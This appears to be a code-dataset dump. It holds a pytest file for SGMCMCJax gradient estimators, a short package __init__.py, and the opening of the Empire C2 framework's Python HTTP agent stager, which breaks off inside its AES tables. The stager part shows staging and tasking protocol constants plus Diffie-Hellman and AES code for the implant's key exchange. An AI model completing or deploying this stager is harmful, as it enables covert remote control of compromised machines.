76fb550626136b4595fa8dfbdb8d64cd8e6640e4 | 5,955 | py | Python | tests/test_gradient_estimation.py | ColCarroll/SGMCMCJax | de1dbf234577fa46ecc98c7c7de4ef547cef52ea | [
"Apache-2.0"
] | null | null | null | tests/test_gradient_estimation.py | ColCarroll/SGMCMCJax | de1dbf234577fa46ecc98c7c7de4ef547cef52ea | [
"Apache-2.0"
] | null | null | null | tests/test_gradient_estimation.py | ColCarroll/SGMCMCJax | de1dbf234577fa46ecc98c7c7de4ef547cef52ea | [
"Apache-2.0"
] | null | null | null | import jax.numpy as jnp
import numpy as np
import pytest
from jax import random
from models import X_data, loglikelihood_array, logprior_array
from sgmcmcjax.gradient_estimation import (
build_gradient_estimation_fn,
build_gradient_estimation_fn_CV,
build_gradient_estimation_fn_SVRG,
)
from sgmcmcjax.types import PRNGKey, PyTree, SamplerState, SVRGState
from sgmcmcjax.util import build_grad_log_post
Ndata, D = X_data.shape
data = (X_data,)
params = jnp.zeros(D)
def test_fullbatch_standard_estimator():
"Check that the standard estimator with fullbatch data returns the exact gradient"
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
batch_size = X_data.shape[0]
estimate_gradient, init_gradient = build_gradient_estimation_fn(
grad_log_post, data, batch_size
)
key = random.PRNGKey(0)
mygrad, svrg_state = estimate_gradient(0, key, jnp.zeros(D))
assert jnp.array_equal(mygrad, grad_log_post(params, *data))
assert svrg_state == SVRGState()
def test_standard_estimator_shape():
"Check shapes for the standard estimator"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_standard, init_gradient = build_gradient_estimation_fn(
grad_log_post, data, batch_size
)
mygrad, svrg_state = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
mygrad, svrg_state = estimate_gradient_standard(0, random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
def test_CV_standard_estimator():
"Check shapes for the CV estimator"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_CV, init_gradient = build_gradient_estimation_fn_CV(
grad_log_post, data, batch_size, params
)
mygrad, svrg_state = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
mygrad, svrg_state = estimate_gradient_CV(0, random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
def test_SVRG_estimator_shape():
"Check shapes for the SVRG estimator"
batch_size = int(0.1 * X_data.shape[0])
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
centering_value = params
update_rate = 100
estimate_gradient_SVRG, init_gradient = build_gradient_estimation_fn_SVRG(
grad_log_post, data, batch_size, update_rate
)
mygrad, svrg_state = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert jnp.array_equal(svrg_state.centering_value, params)
mygrad, svrg_state = estimate_gradient_SVRG(
0, random.PRNGKey(0), params, svrg_state
)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert jnp.array_equal(svrg_state.centering_value, params)
# ======
# Check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
def test_standard_estimator_data_np_array():
"Standard estimator: check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
data = (np.array(X_data),)
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_standard, init_gradient = build_gradient_estimation_fn(
grad_log_post, data, batch_size
)
mygrad, state_svrg = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
mygrad, state_svrg = estimate_gradient_standard(
0, random.PRNGKey(0), params, state_svrg
)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
def test_CV_data_np_array():
"CV estimator: check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
data = (np.array(X_data),)
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_CV, init_gradient = build_gradient_estimation_fn_CV(
grad_log_post, data, batch_size, params
)
mygrad, state_svrg = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
mygrad, state_svrg = estimate_gradient_CV(0, random.PRNGKey(0), params, state_svrg)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
def test_SVRG_data_np_array():
"SVRG estimator: check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
batch_size = int(0.1 * X_data.shape[0])
data = (np.array(X_data),)
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
centering_value = params
update_rate = 100
estimate_gradient, init_gradient = build_gradient_estimation_fn_SVRG(
grad_log_post, data, batch_size, update_rate
)
key = random.PRNGKey(0)
mygrad, state_svrg = init_gradient(key, params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
mygrad, state_svrg = estimate_gradient(0, random.PRNGKey(0), params, state_svrg)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
| 38.668831 | 109 | 0.732662 | 829 | 5,955 | 4.984318 | 0.089264 | 0.075508 | 0.061229 | 0.058083 | 0.839061 | 0.790658 | 0.768151 | 0.768151 | 0.759439 | 0.759439 | 0 | 0.009096 | 0.16927 | 5,955 | 153 | 110 | 38.921569 | 0.826157 | 0.098237 | 0 | 0.587302 | 0 | 0 | 0.082921 | 0.014332 | 0 | 0 | 0 | 0 | 0.253968 | 1 | 0.055556 | false | 0 | 0.063492 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a03a91cf647654e3f3983b873a54494132b534b | 116 | py | Python | sources/algorithms/queries/__init__.py | tipech/OverlapGraph | 0aa132802f2e174608ce33c6bfc24ff14551bf4a | [
"MIT"
] | null | null | null | sources/algorithms/queries/__init__.py | tipech/OverlapGraph | 0aa132802f2e174608ce33c6bfc24ff14551bf4a | [
"MIT"
] | 1 | 2018-10-07T08:06:01.000Z | 2018-10-07T08:06:01.000Z | sources/algorithms/queries/__init__.py | tipech/OverlapGraph | 0aa132802f2e174608ce33c6bfc24ff14551bf4a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from .enumerate import *
from .mrqenum import *
from .srqenum import *
from .rqenum import *
| 16.571429 | 24 | 0.724138 | 16 | 116 | 5.25 | 0.625 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163793 | 116 | 6 | 25 | 19.333333 | 0.865979 | 0.172414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a06c5a0c7b812160d7a0ea884c2f42e4f1210d2 | 72,652 | py | Python | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 3 | 2018-01-05T03:59:44.000Z | 2020-02-11T03:25:46.000Z | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | null | null | null | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 1 | 2018-07-31T15:57:02.000Z | 2018-07-31T15:57:02.000Z | #!/usr/bin/env python
# AES code from https://github.com/ricmoo/pyaes
# DH code from Directly from: https://github.com/lowazo/pyDHE
# See README.md for complete citations and sources
import copy
import sys
import struct
import os
import pwd
import hashlib
import random
import string
import hmac
import urllib2
import socket
import subprocess
from binascii import hexlify
LANGUAGE = {
'NONE' : 0,
'POWERSHELL' : 1,
'PYTHON' : 2
}
LANGUAGE_IDS = {}
for name, ID in LANGUAGE.items(): LANGUAGE_IDS[ID] = name
META = {
'NONE' : 0,
'STAGING_REQUEST' : 1,
'STAGING_RESPONSE' : 2,
'TASKING_REQUEST' : 3,
'RESULT_POST' : 4,
'SERVER_RESPONSE' : 5
}
META_IDS = {}
for name, ID in META.items(): META_IDS[ID] = name
STAGING = {
'NONE' : 0,
'STAGE0' : 1,
'STAGE1' : 2,
'STAGE2' : 3
}
STAGING_IDS = {}
for name, ID in STAGING.items(): STAGING_IDS[ID] = name
ADDITIONAL = {}
ADDITIONAL_IDS = {}
for name, ID in ADDITIONAL.items(): ADDITIONAL_IDS[ID] = name
# If a secure random number generator is unavailable, exit with an error.
try:
try:
import ssl
random_function = ssl.RAND_bytes
random_provider = "Python SSL"
except (AttributeError, ImportError):
import OpenSSL
random_function = OpenSSL.rand.bytes
random_provider = "OpenSSL"
except:
random_function = os.urandom
random_provider = "os.urandom"
class DiffieHellman(object):
"""
A reference implementation of the Diffie-Hellman protocol.
By default, this class uses the 6144-bit MODP Group (Group 17) from RFC 3526.
This prime is sufficient to generate an AES 256 key when used with
a 540+ bit exponent.
"""
def __init__(self, generator=2, group=17, keyLength=540):
"""
Generate the public and private keys.
"""
min_keyLength = 180
default_generator = 2
valid_generators = [2, 3, 5, 7]
# Sanity check fors generator and keyLength
if(generator not in valid_generators):
print("Error: Invalid generator. Using default.")
self.generator = default_generator
else:
self.generator = generator
if(keyLength < min_keyLength):
print("Error: keyLength is too small. Setting to minimum.")
self.keyLength = min_keyLength
else:
self.keyLength = keyLength
self.prime = self.getPrime(group)
self.privateKey = self.genPrivateKey(keyLength)
self.publicKey = self.genPublicKey()
def getPrime(self, group=17):
"""
Given a group number, return a prime.
"""
default_group = 17
primes = {
5: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF,
14: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF,
15: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF,
16: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF,
17:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF,
18:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF
}
if group in primes.keys():
return primes[group]
else:
print("Error: No prime with group %i. Using default." % group)
return primes[default_group]
def genRandom(self, bits):
"""
Generate a random number with the specified number of bits
"""
_rand = 0
_bytes = bits // 8 + 8
while(len(bin(_rand))-2 < bits):
try:
_rand = int.from_bytes(random_function(_bytes), byteorder='big')
except:
_rand = int(random_function(_bytes).encode('hex'), 16)
return _rand
def genPrivateKey(self, bits):
"""
Generate a private key using a secure random number generator.
"""
return self.genRandom(bits)
def genPublicKey(self):
"""
Generate a public key X with g**x % p.
"""
return pow(self.generator, self.privateKey, self.prime)
def checkPublicKey(self, otherKey):
"""
Check the other party's public key to make sure it's valid.
Since a safe prime is used, verify that the Legendre symbol == 1
"""
if(otherKey > 2 and otherKey < self.prime - 1):
if(pow(otherKey, (self.prime - 1)//2, self.prime) == 1):
return True
return False
def genSecret(self, privateKey, otherKey):
"""
Check to make sure the public key is valid, then combine it with the
private key to generate a shared secret.
"""
if(self.checkPublicKey(otherKey) is True):
sharedSecret = pow(otherKey, privateKey, self.prime)
return sharedSecret
else:
raise Exception("Invalid public key.")
def genKey(self, otherKey):
"""
Derive the shared secret, then hash it to obtain the shared key.
"""
self.sharedSecret = self.genSecret(self.privateKey, otherKey)
# Convert the shared secret (int) to an array of bytes in network order
# Otherwise hashlib can't hash it.
try:
_sharedSecretBytes = self.sharedSecret.to_bytes(
len(bin(self.sharedSecret))-2 // 8 + 1, byteorder="big")
except AttributeError:
_sharedSecretBytes = str(self.sharedSecret)
s = hashlib.sha256()
s.update(bytes(_sharedSecretBytes))
self.key = s.digest()
def getKey(self):
"""
Return the shared secret key
"""
return self.key
def _compact_word(word):
return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
def _string_to_bytes(text):
return list(ord(c) for c in text)
def _bytes_to_string(binary):
return "".join(chr(b) for b in binary)
def _concat_list(a, b):
return a + b
def to_bufferable(binary):
return binary
def _get_byte(c):
return ord(c)
# Python 3 compatibility
try:
xrange
except Exception:
xrange = range
# Python 3 supports bytes, which is already an array of integers
def _string_to_bytes(text):
if isinstance(text, bytes):
return text
return [ord(c) for c in text]
# In Python 3, we return bytes
def _bytes_to_string(binary):
return bytes(binary)
# Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first
def _concat_list(a, b):
return a + bytes(b)
def to_bufferable(binary):
if isinstance(binary, bytes):
return binary
return bytes(ord(b) for b in binary)
def _get_byte(c):
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
if len(data) % 16 != 0:
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
class AES(object):
'''Encapsulates the AES block cipher.
You generally should not need this. Use the AESModeOfOperation classes
below instead.'''
# Number of rounds by keysize
number_of_rounds = {16: 10, 24: 12, 32: 14}
# Round constant words
rcon = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91]
# S-box and Inverse S-box (S is for Substitution)
S = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
Si = [0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
# Transformations for encryption
T1 = [0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5, 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d, 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f, 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e, 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb, 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce, 0x5229297b, 